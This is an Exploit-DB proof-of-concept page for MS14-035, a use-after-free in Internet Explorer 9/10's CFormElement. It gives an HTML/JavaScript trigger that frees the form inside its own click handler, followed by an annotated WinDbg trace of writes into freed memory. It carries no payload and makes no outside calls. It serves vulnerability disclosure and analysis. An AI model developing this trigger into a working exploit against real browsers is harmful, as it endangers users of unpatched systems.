Microsoft Internet Explorer 9/10 – CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)

  • 作者: Drozdova Liudmila
    日期: 2014-07-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/34010/
  • <!--
    Exploit Title: MS14-035 Internet Explorer CFormElement Use-after-free and memory corruption POC (no crash! see trace)
    Product: Internet Explorer
    Vulnerable version: 9,10
    Date: 8.07.2014
    Exploit Author: Drozdova Liudmila, ITDefensor Vulnerability Research Team (http://itdefensor.ru/)
    Vendor Homepage: http://www.microsoft.com/
    Tested on: Windows 7 SP1 x86, Internet Explorer 9 and 10
    CVE : unknown (MS14-035 is a cumulative IE update that fixed many memory-corruption CVEs; the CVE covering this particular bug is not identified in this advisory)
    -->
    <html>
    
    <body>
    
    
    <form id="form1">
     <input id="input1" type="text" value="">
    </form>
    
    
    <script>
    
    	loaded = false ; // gate: the handler must stay inert until the PoC has wired itself up below

    // onclick handler for input1.  It runs re-entrantly from inside
    // MSHTML!CInput::DoClick (via CElement::DoClick) while DoClick still holds
    // a raw pointer to the parent CFormElement in esi.  Emptying the body
    // destroys the form, so the stores DoClick makes after the call return
    // land in freed memory -- see the WinDbg trace below.
    function func() {
    	if (!loaded) {
    		return ;
    	}
    	document.body.innerHTML = "" ; // tears down <form id="form1"> -> its CFormElement is freed
    }

    	// Wire the handler, open the gate, then fire a synthetic click so that
    	// CInput::DoClick is entered while the CFormElement is still alive.
    	input1 = document.getElementById("input1") ;
    	input1.onclick = func ;
    	loaded = true ;
    	input1.click() ; // -> MSHTML!CInput::DoClick -> CElement::DoClick -> func()
    	
    	
    
    
    </script>
    </body>
    
    </html>
    <!--
    Vulnerability details

    CInput::DoClick keeps a raw pointer to the parent CFormElement in esi (apparently
    without holding its own reference) across the call to CElement::DoClick.  That call
    dispatches the element's onclick handler -- func() above -- which empties
    document.body and thereby frees the CFormElement.  When CElement::DoClick returns,
    DoClick still trusts esi: the two "and" stores at [esi+64h] and [esi+68h] write into
    the freed chunk (use-after-free).  The 0x78-byte chunk stays mapped in the LFH, so the
    stores do not fault -- hence "no crash".  Turning this into anything beyond a bit-clear
    in freed memory would require reclaiming that chunk with attacker-controlled data before
    the stores execute; this PoC does not attempt that.

    MSHTML!CInput::DoClick
    
    66943670 8bcf            mov     ecx,edi
    66943672 ff751c          push    dword ptr [ebp+1Ch]
    66943675 ff7518          push    dword ptr [ebp+18h]
    66943678 ff7514          push    dword ptr [ebp+14h]
    6694367b ff7510          push    dword ptr [ebp+10h]
    6694367e ff750c          push    dword ptr [ebp+0Ch]
    66943681 ff7508          push    dword ptr [ebp+8]                   ; <---- esi = CFormElement (still live here)
    66943684 e856e4f3ff      call    MSHTML!CElement::DoClick (66881adf) ; <--- dispatches func() in JavaScript, which frees the object esi points to
    66943689 85db            test    ebx,ebx
    6694368b 7408            je      MSHTML!CInput::DoClick+0x74 (66943695)
    6694368d 83666400        and     dword ptr [esi+64h],0            ds:0023:0034cd84=00000001 ; memory corruption: write to freed memory
    66943691 836668fe        and     dword ptr [esi+68h],0FFFFFFFEh                             ; memory corruption: write to freed memory
    
     MSHTML!CInput::DoClick+0x60:
    66943681 ff7508          push    dword ptr [ebp+8]     ss:0023:023ec994=00000000
    0:005> p
    eax=00000001 ebx=00000001 ecx=00317540 edx=66943621 esi=0034cd20 edi=00317540
    eip=66943684 esp=023ec95c ebp=023ec98c iopl=0 nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
    MSHTML!CInput::DoClick+0x63:
    66943684 e856e4f3ff      call    MSHTML!CElement::DoClick (66881adf)
    0:005> dds esi l1
    0034cd20  6661ead8 MSHTML!CFormElement::`vftable'
    
    
    
    0:005> !heap -x esi          <-- before the call: esi points at a live (busy) CFormElement allocation
    Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
    -----------------------------------------------------------------------------
    0034cd18  0034cd20  00270000  002fcee8        78         -        c    LFH;busy
    
    0:005> p
    eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
    eip=66943689 esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
    MSHTML!CInput::DoClick+0x68:
    66943689 85db            test    ebx,ebx
    0:005> dds esi l1
    0034cd20  6661005c MSHTML!CSVGPathSegCurvetoCubicAbs::`vftable'+0x12c
    (not a real vtable: the chunk has been freed -- see !heap below -- and WinDbg merely prints the nearest symbol for whatever value the allocator left in the first dword)
    
    
    
    
    0:005> !heap -x esi          <-- after the call: esi is unchanged but the CFormElement allocation is now free
    Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
    -----------------------------------------------------------------------------
    0034cd18  0034cd20  00270000  002fcee8        78         -        0    LFH;free
    
    0:005> p
    eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
    eip=6694368b esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
    MSHTML!CInput::DoClick+0x6a:
    6694368b 7408            je      MSHTML!CInput::DoClick+0x74 (66943695)   [br=0]   ; ebx=1, so the branch is not taken and the stores below execute
    0:005> p
    eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
    eip=6694368d esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
    MSHTML!CInput::DoClick+0x6c:
    6694368d 83666400        and     dword ptr [esi+64h],0     ds:0023:0034cd84=00000001   ; first store into the freed chunk (0034cd84 lies inside the LFH;free entry above)
    
    
    -->